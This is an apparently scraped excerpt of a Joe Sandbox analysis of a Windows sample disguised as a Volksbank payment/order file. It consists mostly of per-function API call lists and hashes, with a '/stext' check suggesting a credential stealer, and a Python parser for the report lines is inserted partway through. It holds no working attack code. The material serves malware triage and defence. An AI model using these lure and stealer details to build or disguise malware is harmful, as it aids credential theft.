                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseHandleSleep
                                                                                                                                                                                                                                          • String ID: }A
                                                                                                                                                                                                                                          • API String ID: 252777609-2138825249
                                                                                                                                                                                                                                          • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                                          • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: freemallocmemcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3056473165-0
                                                                                                                                                                                                                                          • Opcode ID: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                                                                                                                                          • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                                                          • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                                                                                                          • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                          • String ID: BINARY
                                                                                                                                                                                                                                          • API String ID: 2221118986-907554435
                                                                                                                                                                                                                                          • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                                                                                                                                                                                          • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: _wcsicmp
• String ID: /stext
• API String ID: 2081463915-3817206916
• Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
• Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
• Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
• Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
• CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
• String ID:
• API String ID: 2445788494-0
• Opcode ID: ce69b7b2c0806108a5f6ddf8d326ed6ca623e0dd1ad04f3d7ca3aacd8c235aa4
• Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
• Opcode Fuzzy Hash: ce69b7b2c0806108a5f6ddf8d326ed6ca623e0dd1ad04f3d7ca3aacd8c235aa4
• Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
APIs
Strings
• failed to allocate %u bytes of memory, xrefs: 004152F0
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: malloc
• String ID: failed to allocate %u bytes of memory
• API String ID: 2803490479-1168259600
• Opcode ID: 64e6e31810cf44f5457cabb26306b8422ff78c6177a83d8139193948e1024434
• Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
• Opcode Fuzzy Hash: 64e6e31810cf44f5457cabb26306b8422ff78c6177a83d8139193948e1024434
• Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
APIs
• memset.MSVCRT ref: 0041BDDF
• memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcmpmemset
• String ID:
• API String ID: 1065087418-0
• Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
• Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
• Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
• Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
APIs
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
• memcpy.MSVCRT(00000000,?,?,?,?,00000000,?,?,00000001,00000000,?,00000000), ref: 00406E09
• memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00406E5A
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcpy$??2@
• String ID:
• API String ID: 3700833809-0
• Opcode ID: a02f897a3927f6a5310245556019bb37ee08e9979723da6ff61ad3578280a48a
• Instruction ID: 3357a4f00022c45c5c3ded2ab4a10c96e173cb442a6a42c74f6c45d37007c03c
• Opcode Fuzzy Hash: a02f897a3927f6a5310245556019bb37ee08e9979723da6ff61ad3578280a48a
• Instruction Fuzzy Hash: EE7117B1E00219EBCB04DFA9D8949EEB7B5FF08304F11802EF916A7281D7789951CB64
APIs
  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
• GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
• CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
  • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
  • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
• String ID:
• API String ID: 1381354015-0
• Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
• Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
• Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
• Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
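The "APIs" lines in these function entries all share one textual shape: an optional `Part of subcall function <addr>:` prefix, then `Name.Module(arg,arg,...), ref: <addr>`, with `?` standing for an argument the sandbox could not recover. That regularity makes the entries easy to turn into structured data for pivoting across many reports (for instance, collecting every function that touches `CreateFileW`/`ReadFile` next to a `/stext` comparison; `/stext <file>` is the save-as-text switch of the NirSoft password-recovery tools, which is why a `_wcsicmp` against it is a useful triage pivot). The parser below is an added example written for this page, not Joe Sandbox code; the sample lines it reads are constructed to mirror entries shown above, and the function names `parse_api_lines` and `calls_by_module` are the example's own.

```python
import re
from typing import Dict, List, Optional, Union

# Matches one "APIs" line of a Joe Sandbox function entry, e.g.
#   • GetFileSize.KERNEL32(00000000,?,000003FF), ref: 0040CC44
#   • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040AFD8
#   • memset.MSVCRT ref: 0041BDDF          (no argument list recorded)
_API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[^.\s(]+)\.(?P<mod>[A-Za-z0-9_]+)"   # name may contain ?/@ (C++ mangling)
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

Arg = Union[int, str, None]


def _parse_arg(tok: str) -> Arg:
    """'?' -> None (unrecovered), 8 hex digits -> int, anything else -> literal."""
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok


def parse_api_lines(text: str) -> List[Dict]:
    """Parse every recognisable APIs line into a record; non-matching lines are skipped."""
    records = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [] if raw is None or raw.strip() == "" else [_parse_arg(a) for a in raw.split(",")]
        records.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": args,
            "ref": int(m.group("ref"), 16),
            "subcall": int(m.group("sub"), 16) if m.group("sub") else None,
        })
    return records


def calls_by_module(records: List[Dict]) -> Dict[str, List[str]]:
    """Group distinct API names by the module they were resolved from."""
    out: Dict[str, set] = {}
    for r in records:
        out.setdefault(r["module"], set()).add(r["api"])
    return {mod: sorted(names) for mod, names in out.items()}


# Constructed sample lines, shaped like the entries in this report section.
SAMPLE = """\
• GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4), ref: 0040CC44
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
• memset.MSVCRT ref: 0041BDDF
  • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
• CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
"""

if __name__ == "__main__":
    recs = parse_api_lines(SAMPLE)
    for r in recs:
        where = f"via subcall {r['subcall']:08X}" if r["subcall"] else "direct"
        print(f"{r['ref']:08X} {r['module']}!{r['api']} ({where}) args={r['args']}")
    print(calls_by_module(recs))
```

Integer arguments are stack-slot values as the sandbox printed them, so a value such as `0x40B7D4` is often a return address rather than a real parameter; the `None` entries mark slots the report shows as `?` and should not be treated as zero.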
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004301AD
                                                                                                                                                                                                                                          • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1297977491-0
                                                                                                                                                                                                                                          • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                                                                                                                                                          • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
APIs
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
• Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
• Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
• Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
APIs
  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
  • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
• CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: File$Time$CloseCompareCreateHandlememset
• String ID:
• API String ID: 2154303073-0
• Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
• Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
• Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
• Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
APIs
  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID:
• API String ID: 3150196962-0
• Opcode ID: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
• Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
• Opcode Fuzzy Hash: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
• Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
APIs
• SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: File$PointerRead
• String ID:
• API String ID: 3154509469-0
• Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
• Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
• Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
• Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
APIs
• GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: PrivateProfile$StringWrite_itowmemset
• String ID:
• API String ID: 4232544981-0
• Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
• Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
• Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
• Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
APIs
• FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
• Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
• Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
• Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
APIs
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
• K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
